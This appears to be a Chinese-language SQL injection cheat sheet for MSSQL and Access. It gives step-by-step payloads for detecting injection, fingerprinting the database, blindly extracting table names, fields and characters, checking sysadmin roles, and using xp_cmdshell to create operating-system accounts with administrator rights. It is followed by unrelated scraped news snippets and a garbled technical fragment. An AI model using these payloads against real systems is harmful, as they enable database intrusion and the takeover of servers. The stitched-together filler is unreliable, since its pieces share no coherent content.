1.判断是否有注入
;and1=1
;and1=2
2.初步判断是否是mssql
;anduser>0
3.注入参数是字符
'and[查询条件]and''='
4.搜索时没过滤参数的
'and[查询条件]and'%25'='
5.判断数据库系统
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access
6.猜数据库
;and(SelectCount(*)from[数据库名])>0
7.猜字段
;and(SelectCount(字段名)from数据库名)>0
8.猜字段中记录长度
;and(selecttop1len(字段名)from数据库名)>0
9.(1)猜字段的ascii值(access)
;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0
(2)猜字段的ascii值(mssql)
;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0
10.测试权限结构(mssql)
;and1=(SelectIS_SRVROLEMEMBER('sysadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('serveradmin'));--
;and1=(SelectIS_SRVROLEMEMBER('setupadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('securityadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('diskadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('bulkadmin'));--
;and1=(SelectIS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--
原标题:安卓手机自带微信聊天记录恢复功能你知道吗?实在太好用了 安卓手机大家都知道可玩性非常高,特别是华为手机黑科技更是了不得,不少用户选择华为手机,主要原因性能强大实用功能多。但是对于微信聊...
(领团新闻资讯)日前,网络技术观测员鲁振旺在新浪微博对2012年上半年的电子商务开展了排行,从经营规模上看,天猫商城第一,京东商城第二。 鲁振旺在新浪微博中剖析,从经营规模上,上半年十二大电商排名先后...
明天就是传统的基督节日“圣诞节”了,今天晚上则被称为“平安夜”,相信有不少人在今天收到了平安果,往年到了这个时候商场上,大街的橱窗里都已经摆上了圣诞装饰,但是对于圣诞节这个从西方漂洋过海而来的节日大家...
布置测验环境sudo apt-get install mono-complete .port(Integer.parseInt(port))6.29这也就意味着,CloudFront所绑定的仅有节点跟...
在产物运营及设计中配置鼓励机制,可以更有效的耽误产物的的生命周期,吸引方针用户。那么日常都有哪些可以利用的鼓励手段呢?来看看作者的阐明。 一、为什么我们在运营和设计产物时,需要鼓励? 运营和产物在同一...
企业网站遭受黑客攻击后的处理步骤:1、修改网站后台登录密码。2、将被黑客修改的页面进行修复。3、如果黑客的攻击造成企业亏损的选择报警,由公安局立案。 1、首先要第一时间登陆邮箱,修改密码2、然后联系...